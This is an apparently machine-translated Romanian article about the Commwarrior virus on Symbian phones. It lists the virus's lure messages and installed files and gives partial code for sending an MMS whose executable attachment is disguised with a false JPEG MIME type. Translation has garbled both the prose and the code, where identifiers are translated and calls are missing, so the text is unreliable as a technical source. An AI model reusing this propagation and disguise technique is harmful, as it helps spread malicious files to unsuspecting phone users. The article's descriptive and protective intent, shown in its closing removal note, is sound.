infecția cu virusul de telefon al mms-Mesaj, catamobile

infecția cu virusul de telefon al mms-Mesaj, catamobile

Utilizarea populare în special în rândul tinerilor MMS-service este plină cu multe pericole pe care cei mai mulți oameni sunt, din păcate, nu suspecți.

Cu toate acestea, într-un mediu de scădere a prețurilor pentru Internet mobil, apariția unor tarife nelimitate. popularizare a MMS-servicii, precum și cu o dezvoltare corespunzătoare a tehnologiilor virale, astfel de scenarii pot deveni foarte real în viitor.

virus Commwarrior MMS-mesaje care conțin text, fapt care ia determinat deschis mesajul, și fișierul commw.sis. Extinderea fișierul SIS atașat indică faptul că fișierul este un executabil pentru platforma Symbian - cel mai popular sistem de operare pentru dispozitive mobile, în acest moment.

Cea mai recentă versiune a victimelor virusului Commwarrior trimite mesaje MMS cu următorul text:

Titlu: 3DNow!
Mesaj: 3DGame de la mine. Este GRATUIT!

Titlu: MatrixRemover
Mesaj: Matricea te are. Eliminați matrice!

Titlu: Nokia ringtoner
Mesaj: Nokia RingtoneManager pentru toate modelele.

După ce fișier Commwarrior SIS este instalat, fișierele executabile vor fi plasate în dosarul:

În cazul în care virusul commwarrior.exe copiat în dosare

\ System \ update \ commrec.mdl
\ System \ update \ commwarrior.exe
\ System \ update \ commw.sis

După crearea fișierului \ sistem \ update \ commw.sis virusul începe trimiterea de mesaje MMS.

Luați în considerare unele detalii ale mecanismului de infecție prin mesaje MMS. Aceste bucăți de software-ul „organism“ al virusului sunt incomplete din motive de securitate, iar codul se aplică numai pentru a analizat trimite mesaje MMS și nu este legată de virusul de încărcare malware.

Deci, în primul rând, virusul creează o sesiune de a lucra cu centrul de mesaje. Acest lucru se face folosind următoarea declarație.

Rezultată ID-ul de sesiune este utilizat pentru a crea un client care acceseaza Centrul de mesaje. Un astfel de client este creat după cum urmează.

Având în vedere că activitatea centrului se efectuează numai pentru mesaje trimite mesaje MMS, atunci trebuie să convertiți clientul creat pentru orice MMS-client.

iMmsMtm = mstatic_cast
(IMtmReg-> NewMtmL (KUidMsgTypeMultimedia));

Metoda SwitchCurrentEntryL numit cu parametrul Kmsv-DraftEntryld indică faptul că locul actual de creație doar selectat directorul „Schiță“, care este doar un catalog de „Schiță“. După ce directorul este definit, creat MMS-mesaj cu setările „default“. Acest lucru se face utilizând următorul apel:

Apoi, trebuie să inițializa principalele MMS de câmp. Pentru a face acest lucru cu ajutorul unor variabile macro _LIT sunt inițializate la principal. Sistemul de operare Symbian creează un variabile JLIT macro. Astfel, cu ajutorul următoarelor variabile sunt definite:

_LIT (KSamsNumber, "07738123456");
_LIT (KSamsAlias, "Sam");
_LIT (KPetesNumber, "07812654321");
_LIT (KMessageSubject, "Nokia ringtoner");

Variabilele pot fi nume arbitrare. În acest exemplu, variabila este stocată în KSamsNumber atacat numărul de abonat, iar KSamsAlias ​​variabile create păstrat numele său enumerate într-un caiet. Variabila KPetesNumber se potrivește numărul expeditorului, și generează un mesaj înregistrat alternativ KMessageSubject subiect. Odată ce sunt formate toate variabilele, se efectuează pentru a inițializa câmpurile deja create mesaje MMS. Acest lucru se face folosind metode și AddAddresseeL SetSubjectL. Prima metodă este transmis EmsvRecipientTo parametru, care identifică câmpul expeditorului. Opțiunea EmsvRecipientCc inițializează câmpul destinatar.

iMmsMtm-> AddAddresseeL (EMsvRecipientTo, KSamsNumber, KSamsAlias);
iMmsMtm-> AddAddresseeL (EMsvRecipientCc, KPetesNumber);
iMmsMtm-> SetSubjectL (KMessageSubject);

Urmează principalele proces - aplicații de atașare.

Pentru a face acest lucru, creați mai întâi o variabilă cu numele fișierului atașat la e-mail. În acest caz, virusul este trimis la MMS. Prin urmare, după cum numele fișierului indică numele programului virusului.

Odată ce variabila este inițializat, se creează o instanță a TFileName de clasă, care descrie mesajul atașat. Utilizați metoda Append a obiectului creat attachmentFile inițializată de date, cum ar fi calea fișierului și numele fișierului în sine.

TFileName attachmentFile (KPhoneRootPath);
attachmentFile.Append (KDirPictures);
attachmentFile. Append (KFileName);

După efectuarea acestor acțiuni, virusul creează și descrie informațiile de serviciu privind tipurile de atașamente. De obicei, virusul se specifică în mod deliberat un tip nevalid de fișier de atașare (de tip mime), de exemplu, JPG, astfel încât utilizatorul nu suspectează un atac atunci când trimiterea prin intermediul fișierului MMS. Tipuri de mime sunt determinate utilizând codul de mai jos.

CMsvMimeHeaders * mimeHeaders = CMsvMimeHeaders :: NewL ();
CleanupStack :: PushL (mimeHeaders);
mimeHeaders->
SetSuggestedFilenameL (KFileName);
_UT8 (KMimeType, "image / jpeg");
TBufC8
mimetype (KMimeType);

Următoarea inițializată de date pentru a trimite mesaje.

CMsvAttachment * attalnfo = CMsvAttachment :: NewL (CMsvAttachment :: EMsvFile);
CleanupStack :: PushL (attalnfo);
_UT8 (KMimeType, "image / jpeg");
TBufC8 mimetype (KMimeType);

În rândurile de mai sus descrie ceea ce-un mesaj MMS, doar un singur fișier este atașat. După ce sunt făcute toate pregătirile necesare, metoda se numește Creare Anexa 2 L și este creat-un mesaj MMS.

iMmsMtm-> CreateAttachment2L (
* Magazin,
atașament,
mIMETYPE,
* MimeHeaders,
attalnfo,
attachld);
CleanupStack :: Pop (attalnfo);
CleanupStack :: PopAndDestroy (mimeHeaders);

generarea mesajului se încheie cu următoarele linii de program.

magazin de> CommitL ();
attachment.Close ();
CleanupStack :: PopAndDestroy (atașament);
CleanupStack :: PopAndDestroy (magazin);

Mesajul este salvat după preparare completă prin metoda SaveMessageL ().

În cele din urmă, trimite mesajul după cum urmează.

Protecție atac

În cazul în care virusul luat încă de pe dispozitivul mobil, capacitatea de a obține în condiții de siguranță scăpa de ea încă mai există. Puteți elimina personal fișierul rău intenționat, dacă știi unde să-l găsească. In cazul in care sunt atacate de un virus necunoscut, trebuie să-și petreacă o mulțime de timp să-l găsească. Este necesar să aveți grijă să nu ștergeți accidental fișierele de sistem.

Resurse suplimentare: